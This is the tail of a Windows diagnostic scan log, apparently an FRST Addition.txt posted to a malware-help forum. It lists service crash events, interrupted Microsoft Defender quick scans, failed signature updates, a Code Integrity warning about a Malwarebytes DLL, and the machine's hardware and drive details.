Error: (07/30/2022 01:14:36 PM) (Source: DCOM) (EventID: 10010) (User: MIGGYPC)
Description: The server {F9717507-6651-4EDB-BFF7-AE615179BCCF} did not register with DCOM within the required timeout.
Error: (07/30/2022 01:14:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Modules Installer service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 120000 milliseconds: Restart the service.
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The EABackgroundService service terminated unexpectedly. It has done this 1 time(s).
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Steam Client Service service terminated unexpectedly. It has done this 1 time(s).
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 6000 milliseconds: Restart the service.
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service.
Error: (07/30/2022 01:14:28 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Gaming Services service terminated unexpectedly. It has done this 1 time(s).
Windows Defender:
================
Date: 2022-07-28 14:06:04
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-24 21:12:19
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-21 18:46:02
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-17 18:02:02
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Date: 2022-07-15 19:09:08
Description:
Microsoft Defender Antivirus scan has been stopped before completion.
Scan Type: Antimalware
Scan Parameters: Quick Scan
Event[0]:
Date: 2022-07-26 12:51:12
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 1.371.884.0
Previous security intelligence Version: 1.371.832.0
Update Source: User
Security intelligence Type: AntiSpyware
Update Type: Delta
Current Engine Version: 1.1.19400.3
Previous Engine Version: 1.1.19400.3
Error code: 0x80509004
Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support.
Date: 2022-07-26 12:51:12
Description:
Microsoft Defender Antivirus has encountered an error trying to update security intelligence.
New security intelligence Version: 1.371.884.0
Previous security intelligence Version: 1.371.832.0
Update Source: User
Security intelligence Type: AntiVirus
Update Type: Delta
Current Engine Version: 1.1.19400.3
Previous Engine Version: 1.1.19400.3
Error code: 0x80509004
Error description: An unexpected problem occurred. Install any available updates, and then try to start the program again. For information on installing updates, see Help and Support.
CodeIntegrity:
===============
Date: 2022-07-26 16:24:08
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
==================== Memory info ===========================
BIOS: American Megatrends Inc. F50 11/28/2019
Motherboard: Gigabyte Technology Co., Ltd. A320M-S2H-CF
Processor: AMD Ryzen 5 3600 6-Core Processor
Percentage of memory in use: 86%
Total physical RAM: 8139.07 MB
Available physical RAM: 1130 MB
Total Virtual: 21451.07 MB
Available Virtual: 11757.37 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:475.83 GB) (Free:77.48 GB) (Model: TEAM T253X2512G) NTFS
\\?\Volume{590e5d8c-1754-4989-bc02-b0320b4dd94a}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{2461b620-0642-4655-b8ff-4e37ffcad3aa}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
\\?\Volume{19c0c6cf-4c0d-97a3-0d37-e79c8c13d025}\ () (Fixed) (Total:0.01 GB) (Free:0 GB) NTFS
\\?\Volume{a7ea1218-f889-4125-8806-9e75e9dba896}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (Protective MBR) (Size: 476.9 GB) (Disk ID: 00000000)
Partition: GPT.
Attempted reading MBR returned 0 bytes.
Could not read MBR for disk 1.
==================== End of Addition.txt =======================
2 user(s) are reading this topic
0 members, 2 guests, 0 anonymous users
